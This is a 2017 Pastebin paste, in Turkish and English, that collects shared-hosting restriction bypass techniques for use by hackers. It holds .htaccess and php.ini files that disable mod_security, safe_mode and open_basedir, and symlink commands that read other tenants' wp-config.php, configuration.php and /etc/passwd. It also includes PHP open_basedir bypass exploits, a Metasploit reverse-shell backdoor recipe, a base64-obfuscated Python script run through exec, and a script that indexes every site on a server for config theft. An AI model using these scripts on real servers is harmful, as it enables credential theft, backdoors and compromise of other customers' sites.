API tools faq
paste
KingSkrupellos

Tüm Linux Win Server ByPass Symlink Htaccess Teknikleri

KingSkrupellos
Sep 19th, 2017
93
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.95 KB | None | 0 0
raw download clone embed print report
  1. Konu Başlığı => Linux ve Windows Server [ Sunucu ] ByPass Symlink .htaccess .php.ini OVH Hosting LiteSpeed Server Restriction Bypass Vulnerability ile Atlatma Teknikleri [ 19.09.2017 ]
  2.  
  3. Orjinal Konu Linki => Orjinal Konu Linki => https://www.cyberizm.org/cyberizm-tum-linux-win-server-bypass-symlink-htaccess-teknikleri.html
  4.  
  5. Hazırlayan => KingSkrupellos - Cyberizm Digital Security Team
  6.  
  7. Tüm Hepsini Okumadan Önce Mutlaka Okumanız Gereken Makale =>
  8.  
  9. Sunucularda Güvenlik Modunu Devre Dışı Bırakma Detaylı Anlatım
  10.  
  11. [hide][code]https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html[/code][/hide]
  12.  
  13. Konuyla ilgili BAZI Videolu Anlatımlar =>
  14.  
  15. [video=youtube]https://www.youtube.com/watch?v=OU7gakFAEf0[/video]
  16.  
  17. [video=youtube]https://www.youtube.com/watch?v=dQ1y1GSiobA[/video]
  18.  
  19. [video=youtube]https://www.youtube.com/watch?v=5dkb8aHknYg[/video]
  20.  
  21. [video=youtube]https://www.youtube.com/watch?v=y2V1VK7w77c[/video]
  22.  
  23. [video=youtube]https://www.youtube.com/watch?v=CNMRkOY225I[/video]
  24.  
  25. [video=youtube]https://www.youtube.com/watch?v=nNVk5AxKsIE[/video]
  26.  
  27. [video=youtube]https://www.youtube.com/watch?v=drcru-MI2sI[/video]
  28.  
  29. [video=youtube]https://www.youtube.com/watch?v=-DIasGdWimM[/video]
  30.  
  31. [video=youtube]https://www.youtube.com/watch?v=0POx2Gsrrxs[/video]
  32.  
  33. [video=youtube]https://www.youtube.com/watch?v=1kggQCF79DE[/video]
  34.  
  35. İçindekiler =>
  36.  
  37. 1) - [ Bypass Directory ]-
  38.  
  39. 2) Bypass Symlink with .htaccess
  40.  
  41. 3) LiteSpeed Bypass [SymLink]
  42.  
  43. 4) Litespeed Symlink 403 Forbidden Bypass
  44.  
  45. 5) - [ Include symlink ]-
  46.  
  47. 6) - [ Bypass Litespeed ] -
  48.  
  49. 7) - [ ByPass OVH Hosting ]-
  50.  
  51. 8) - [ Bypass Symlink 403 forbidden ] -
  52.  
  53. 9) Bypass symlink via .htaccess 2016
  54.  
  55. 10 ) ByPass Passwd in LiteSpeed Genel Mantık
  56.  
  57. 11 ) Bypass Symlink (Priv8) Code
  58.  
  59. 12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
  60.  
  61. 13 ) Server Bypass OVH & BlueHost Symlink Code 2014
  62.  
  63. 14 ) Symlink Bypass 404
  64.  
  65. 15) Internal Server Error ByPass Hatası ve Çözümü Kodu
  66.  
  67. 16) Metasploit Bypass Backconnect & Get Domainowners
  68.  
  69. 17 ) Server Bypass read and edit file with python script Work On (Linux,Win)
  70.  
  71. __________________________________________
  72.  
  73. - [ Bypass Directory ]-
  74.  
  75. [code]<Directory "/home/user/public_html">
  76. Options -ExecCGI
  77. AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
  78. </Directory>[/code]
  79.  
  80. Bypass Symlink with .htaccess
  81.  
  82. [code]
  83. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  84. AddHandler txt .php
  85. AddHandler cgi-script .pl
  86. AddHandler cgi-script .pl
  87. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  88. Options Indexes FollowSymLinks
  89. AddType txt .php
  90. AddType text/html .shtml
  91. Options All
  92. Options All[/code]
  93.  
  94. LiteSpeed Bypass [SymLink]
  95.  
  96. [code]
  97. python shell , CGI PERL Shell
  98. and .htaccess
  99. the htaccess code is
  100. Options Indexes FollowSymLinks
  101. DirectoryIndex ssssss.htm
  102. AddType txt .php
  103. AddHandler txt .php
  104. <IfModule mod_autoindex.c>
  105. IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
  106. </ifModule>
  107. <IfModule mod_security.c>
  108. SecFilterEngine Off
  109. SecFilterScanPOST Off
  110. </IfModule>
  111. Options +FollowSymLinks
  112. DirectoryIndex Sux.html
  113. Options +Indexes
  114. AddType text/plain .php
  115. AddHandler server-parsed .php
  116. AddType text/plain .html
  117. ===============
  118. what we should do ?
  119. just open the cgi bypass shell
  120. and do sym
  121. ln -s /home/user/public_html/wp-config.php 1.txt
  122. then
  123. cat 1.txt[/code]
  124.  
  125. Litespeed Symlink 403 Forbidden Bypass
  126.  
  127. [code]
  128. Options all
  129. DirectoryIndex Sux.html
  130. AddType text/plain .php
  131. AddHandler server-parsed .php
  132. AddType text/plain .html
  133. AddHandler txt .html
  134. Require None
  135. Satisfy Any
  136. DirectoryIndex new
  137. DirectoryIndex config.ini[/code]
  138.  
  139.  
  140. - [ Include symlink ]-
  141.  
  142. [code]
  143. Options Indexes FollowSymLinks
  144. DirectoryIndex ssssss.htm
  145. AddType txt .php
  146. AddHandler txt .php[/code]
  147.  
  148. - [ Bypass Litespeed ] -
  149.  
  150. [code]
  151. wew.shtml
  152. do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
  153. .htaccess
  154. Options +FollowSymLinks
  155. DirectoryIndex chesss.html
  156. RemoveHandler .php
  157. AddType application/octet-stream .php[/code]
  158.  
  159. - [ Bypass OVH ]-
  160.  
  161. [code]
  162. .htaccess
  163. Options +FollowSymLinks
  164. DirectoryIndex Index.html
  165. Options +Indexes
  166. AddType text/plain .php
  167. AddHandler server-parsed .php
  168. AddType root .root
  169. AddHandler cgi-script .root
  170. AddHandler cgi-script .root
  171. php.ini
  172. safe_mode = Off
  173. disable_functions =
  174. safe_mode_gid = Off
  175. open_basedir = Off
  176. register_globals = on
  177. exec = On
  178. shell_exec = On
  179. ln -s / CoderSec[/code]
  180.  
  181. - [ Bypass Symlink 403 forbidden ] -
  182.  
  183. [code]
  184. .htaccess
  185. Options all
  186. DirectoryIndex Sux.html
  187. AddType text/plain .php
  188. AddHandler server-parsed .php
  189. AddType text/plain .html
  190. AddHandler txt .html
  191. Require None
  192. Satisfy Any[/code]
  193.  
  194.  
  195. Bypass symlink via .htaccess 2016
  196.  
  197. [code]
  198. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  199. AddHandler txt .php
  200. AddHandler cgi-script .cgi
  201. AddHandler cgi-script .pl
  202. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  203. Options Indexes FollowSymLinks
  204. AddType txt .php
  205. AddType text/html .shtml
  206. Options All
  207. Options All[/code]
  208.  
  209.  
  210. ByPass Passwd in LiteSpeed Genel Mantık
  211.  
  212. [code]
  213. A good way to bypass forbidden error when reading passwd file
  214. The general approach:
  215.  
  216.  
  217. ln -s / etc / passwd passwd.txt
  218.  
  219. Well, open the passwd file The forbidden error encountered
  220. for bypass=>
  221.  
  222. To bypass coming from one of the following two commands are used:
  223. Code: (Select All)
  224. ln -s /etc/passwd README
  225. ln -s /etc/passwd HEADER
  226. The second command will run in a directory And when we go back to the directory where the file will be shown passwd us.
  227. SPT to b0x
  228.  
  229. Bypass Symlink (Priv8)
  230. How you can bypass Symlink in linux webserver ?
  231.  
  232. 1/ Create a folder
  233.  
  234. 2/ Upload inside
  235.  
  236. ".htaccess"
  237.  
  238. CODE:
  239.  
  240. Options all
  241. DirectoryIndex Sux.html
  242. AddType text/plain .php
  243. AddHandler server-parsed .php
  244. AddType text/plain .html
  245. AddHandler txt .html
  246. Require None
  247. Satisfy Any
  248.  
  249. 3/ Bypass manually
  250.  
  251. ln -s /home/user/public_html/t0ph4cking.txt
  252.  
  253. Bypass Symlink 403 Forbidden with .htaccess
  254.  
  255. Options all
  256. DirectoryIndex Sux.html
  257. AddType text/plain .php
  258. AddHandler server-parsed .php
  259. AddType text/plain .html
  260. AddHandler txt .html
  261. Require None
  262. Satisfy Any[/code]
  263.  
  264. Simple Bypass Internal Server Error Symlink 2016
  265.  
  266. [code]
  267. Options Indexes FollowSymLinks
  268. DirectoryIndex linuxsec.htm
  269. AddType txt .php
  270. AddHandler txt .php[/code]
  271.  
  272. PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
  273.  
  274. [code]
  275. <?php
  276. /*
  277. PHP 5.2.11/5.3.0 symlink() open_basedir bypass
  278. by KingSkrupellos - Cyberizm Digital Security Team
  279.  
  280. CHUJWAMWMUZG
  281. */
  282.  
  283. $fakedir="cx";
  284. $fakedep=16;
  285.  
  286. $num=0; // offset of symlink.$num
  287.  
  288. if(!empty($_GET['file'])) $file=$_GET['file'];
  289. else if(!empty($_POST['file'])) $file=$_POST['file'];
  290. else $file="";
  291.  
  292. echo '<PRE><img
  293. src="http://www.cyberizm.org/"><P>This is exploit
  294. from <a
  295. href="http://securityreason.com/" title="Cyberizm PHP">Cyberizm
  296. Lab - SecurityReason</a> labs.
  297. Author : KingSkrupellos
  298. <p>Script for legal use only.
  299. <p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
  300. <p>More: <a href="http://cyberizm.org/">Cyberizm</a>
  301. <p><form name="form"
  302. action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
  303. "]).'" method="post"><input type="text" name="file" size="50"
  304. value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
  305. value="Create Symlink"></form>';
  306.  
  307. if(empty($file))
  308. exit;
  309.  
  310. if(!is_writable("."))
  311. die("not writable directory");
  312.  
  313. $level=0;
  314.  
  315. for($as=0;$as<$fakedep;$as++){
  316. if(!file_exists($fakedir))
  317. mkdir($fakedir);
  318. chdir($fakedir);
  319. }
  320.  
  321. while(1<$as--) chdir("..");
  322.  
  323. $hardstyle = explode("/", $file);
  324.  
  325. for($a=0;$a<count($hardstyle);$a++){
  326. if(!empty($hardstyle[$a])){
  327. if(!file_exists($hardstyle[$a]))
  328. mkdir($hardstyle[$a]);
  329. chdir($hardstyle[$a]);
  330. $as++;
  331. }
  332. }
  333. $as++;
  334. while($as--)
  335. chdir("..");
  336.  
  337. @rmdir("fakesymlink");
  338. @unlink("fakesymlink");
  339.  
  340. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  341.  
  342. // this loop will skip allready created symlinks.
  343. while(1)
  344. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
  345. "symlink".$num))) break;
  346. else $num++;
  347.  
  348. @unlink("fakesymlink");
  349. mkdir("fakesymlink");
  350.  
  351. die('<FONT COLOR="RED">check symlink <a
  352. href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
  353.  
  354. ?>
  355.  
  356. PHP Symbolic Link Open_Basedir Bypass Vulnerability
  357.  
  358. script1.php
  359. <?
  360. symlink("a/a/a/a/a/a/", "dummy");
  361. symlink("dummy/../../../../../../etc/passwd", "xxx");
  362. unlink("dummy");
  363. while (1) {
  364. symlink(".", "dummy");
  365. unlink("dummy");
  366. }
  367. ?>
  368.  
  369. script2.php
  370. <?
  371. while (1) {
  372. print @file_get_contents("xxx");
  373. }
  374. ?>[/code]
  375.  
  376. Symlink Bypass 404
  377.  
  378. [code]
  379. <? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
  380. rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
  381. fwrite($anu,"ReadmeName x.txt");
  382. echo'<a href=sl/x.txt>CHECK</a>';
  383. }[/code]
  384.  
  385.  
  386. Server Bypass OVH & BlueHost Symlink Code 2014
  387.  
  388. [code]
  389. ".htaccess":
  390.  
  391. #Bypass By Cyberizm.Org
  392. <DIRECTORY /..../user/..../>
  393. OPTIONS Indexes ExecCGI FollowSymLinks
  394. AllowOverride All
  395. </DIRECTORY>
  396. AddType txt .php
  397. AddHandler txt .php
  398.  
  399.  
  400. "php.ini":
  401.  
  402. #Bypass By Cyberizm.Org
  403. safe_mode = OFF
  404. disable_functions = NONE
  405. safe_mode_gid = OFF
  406. open_basedir = OFF
  407. register_globals = ON
  408. exec = ON
  409. shell_exec = ON[/code]
  410.  
  411. Internal Server Error ByPass Hatası ve Çözümü Kodu
  412.  
  413. [code]
  414. Bazen serverde cgi telnet shell derken internal server error diye gıcık bir hata alırsınız bunun çözüm yolu çok olmakla birlikte en garanti çözüm yolu cpanel girip MiME types bölümüne gelip ilk satıra
  415.  
  416. application/x-httpd-cgi
  417.  
  418. yı yazmak daha sonra ikinci satıra cgi shelinizin uzantısını yazmak mesela ali.veli şeklindeyse cgi sheliniz ikinci satıra veli yazıp okeylemek sonra broswere grip o cgi shelein olduğu adresi yenilemek tabi bu arada bu yenileme işlemini yapmadan önce ali.veli şeklindeki cgi shelimize chmod 755 vermeyi unutmayacaz
  419.  
  420. Öncelikle Serverimize CGI atmadan once Perl Kodlarımızı Açıyoruz Ve en başta olan
  421.  
  422. #!/usr/bin/perl -I/usr/local/bandmain yazıyoruz ve Serverimize upload ediyoruz.
  423.  
  424. Eğerki serverde tekrar hata oluyorsaniz Web Shell CGİ Denemenizi isterim
  425.  
  426. http://archive.is/UT8xf Buyrun burada
  427.  
  428. .htaccess code :
  429. Options +FollowSymLinks
  430. DirectoryIndex seees.html
  431. Options +Indexes
  432. Options +ExecCGI
  433. AddHandler cgi-script cgi pl wasRewriteEngine on
  434. RewriteRule (.*)\.was$ $1.was[/code]
  435.  
  436. Metasploit Bypass Backconnect & Get Domainowners
  437.  
  438. [code]
  439. ////////////////////SET UP BACKDOOR////////////////////
  440. use payload/php/reverse_php
  441. set LHOST [You Wan Ip] set LPORT 22
  442. set ENCODER php/base64
  443. generate -t raw
  444.  
  445. ////////////////SET UP LISTENING/////////////////
  446. use exploit/multi/handler
  447. set LHOST [You Lan IP] set LPORT 22
  448. set payload php/reverse_php
  449. exploit
  450.  
  451. /////////////////// RUN BACKDOOR////////////////
  452. php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
  453. //////////////////CAT /ETC/PASSWD//////////////
  454. cat /etc/passwd > passwd.txt
  455. ///////////////////CAT USER-DOMAIN/////////////
  456. cat /etc/virtual/domainowners > domain.txt[/code]
  457.  
  458. ____________________
  459.  
  460. [code]
  461. #!/usr/bin/python
  462. #-------------------------------------------------------------------------------
  463. # Author: KingSkrupellos
  464. # WebSite Cyberizm.Org
  465. #-------------------------------------------------------------------------------
  466. import base64;
  467. exec(base64.b64decode('cHJpbnQgIiNvbWFucm9vdCINCnByaW50ICIjb20tcm9vdEBob3RtYWlsLmNvbSINCnByaW50ICIjR3JlZXRzICwgQWxsIE9tYW5pIEFuZCBNdXNsaW0gR3JheWhhdCINCnB1dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlIGZpbGUgeW91IHdhbnQgdG8gYnJvd3NlIGl0IDogIikgIyBIZXJlIHRoZSBVc2VyIEVudGVyIGhpcyBmaWxlIHdhbnQgdG8gcHJvY2Nlc3MgaXQuDQp3b3JyID0gcmF3X2lucHV0KCJOb3RpY2UgLCAgdGhlIG1vZGVzIHdpbGwgZXhlY3V0ZSBpcyB3cml0ZT13IHJlYWQ9ciAsLCBmb3IgY29udGludWF0aW9uIHByZXNzIDxFbnRlcj4gOiIpICNoZXJlIHRoZSB1c2VyIGlmIGFjY2VwdCB0byB0aGUgZmlsZS4NCmlmIHdvcnIgPT0gJ3InIG9yICdyZWFkJyA6ICNoZXJlIHByb2Nlc3Mgb2YgcmVhZGluZw0KICAgIHJlYWQgPSBvcGVuKHB1dCwncicpDQogICAgZGF0YSA9IHJlYWQucmVhZCgpDQogICAgcHJpbnQgZGF0YQ0KaWYgd29yciA9PSAndycgb3IgJ3dyaXRlJzogI2hlcmUgcHJvY2VzcyBvZiB3cml0ZQ0KICAgIHdyaXRlID0gb3BlbihwdXQsJ3cnKQ0KICAgIHR4dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlIHRleHQgeW91IHdhbnQgdG8gYWRkIHRvIHRoZSBmaWxlIE5vdGljZShBTEwgZGF0YSBvbiB0aGlzIGZpbGUgeW91IHdpbGwgbG9zdCBpdCBcImlmIHlvdSBkb24ndCB3YW50IHBsZWFzZSBwcmVzcyBcJ0NUUkwrQ1wnIFwiKSA6IikNCiAgICB3cml0ZS53cml0ZSh0eHQpDQogICAgcHJpbnQgImNoZWNrIHlvdXIgZmlsZSAsIGlmIGl0IHdhcyBkb25lIC4iDQplbHNlOg0KICAgIHByaW50ICJFcnJvciINCiAgICBleGl0KCkNCg0KI0RvbmUgQnkgT21hbnJvb3Q='))[/code]
  468.  
  469. Symlink 404 Not Found Script
  470.  
  471. [code]
  472. #!/usr/bin/env python
  473. #Symlink Script by KingSkrupellos
  474. #Creates Symlinks and makes a neat PHP index of sites in the dir "kidsymx"
  475. #Version 1.1
  476. #Minor fixes
  477. #
  478. #contact me @ Cyberizm Digital Security Team
  479. #Cyberizm
  480. import os,sys,re
  481. if not os.path.exists('kidsymx'):
  482. os.makedirs('kidsymx')
  483. os.chdir('kidsymx')
  484. hta='Options Indexes FollowSymLinks\nDirectoryIndex kSym.php\nAddType txt .php\nAddHandler txt .php\n'
  485. x=open('.htaccess','w')
  486. x.write(hta)
  487. x.close()
  488. print '[+] htaccess created'
  489. h="<html><head><title>kidSym</title><style>table,tr,td{padding: 7px 10px 7px 10px ; border: 1px solid black;} .menf{font-color:lime; font-size:11px; font-weight:bold;}</style></head><body bgcolor=#98FF98><center>
  490. <h1>
  491. kidSym</h1>
  492. <p class=menf>
  493. KingSkrupellos
  494. greetz:Cyberizm Digital Security Team</p>
  495. <table >"
  496. os.system("ln -s / kid.txt")
  497. if os.path.exists('kid.txt'):
  498. print "[+] Symlink Created"
  499. else:
  500. print "[-] Unable to Create Symlink"
  501. usrs=[]
  502. sitesx=[]
  503. z=open("/etc/passwd","r")
  504. z=z.read()
  505. z=re.findall('/home\w*?/\w+',z)
  506. for usr in z:
  507. usrs.append(usr)
  508.  
  509. sites=os.listdir("/var/named/")
  510. for site in sites:
  511. site=site.replace(".db","")
  512. sitesx.append(site)
  513.  
  514. #php making
  515. path=os.getcwd()
  516. if "/public_html/" in path:
  517. path="/public_html/"
  518. else:
  519. path="/html/"
  520. counter=1
  521. indx=open("kSym.php","w")
  522. indx.write(h)
  523. for userx in usrs:
  524. for sitex in sitesx:
  525. u=userx.split("/",2)[2][0:5]
  526. s=sitex[0:5]
  527. if u==s:
  528. indx.write("
  529. <tr><td style=font-family:calibri;font-weight:bold;color:grey;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href="kid.txt%s%s" target="_blank">%s</a></td>"%(counter,userx.split("/",3)[2],userx,path,sitex))
  530. counter=counter+1
  531. print "[+] Site index Complete"
  532.  
  533. print "[*] %s Sites found" %str(counter)
  534.  
  535. print "[+] Happy Hacking ./KingSkrupellos Cyberizm Digital Security Team"[/code]
  536.  
  537. İşlem Bu Kadar. Happy Hacking. Mr. KingSkrupellos Cyberizm Digital Security Team
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!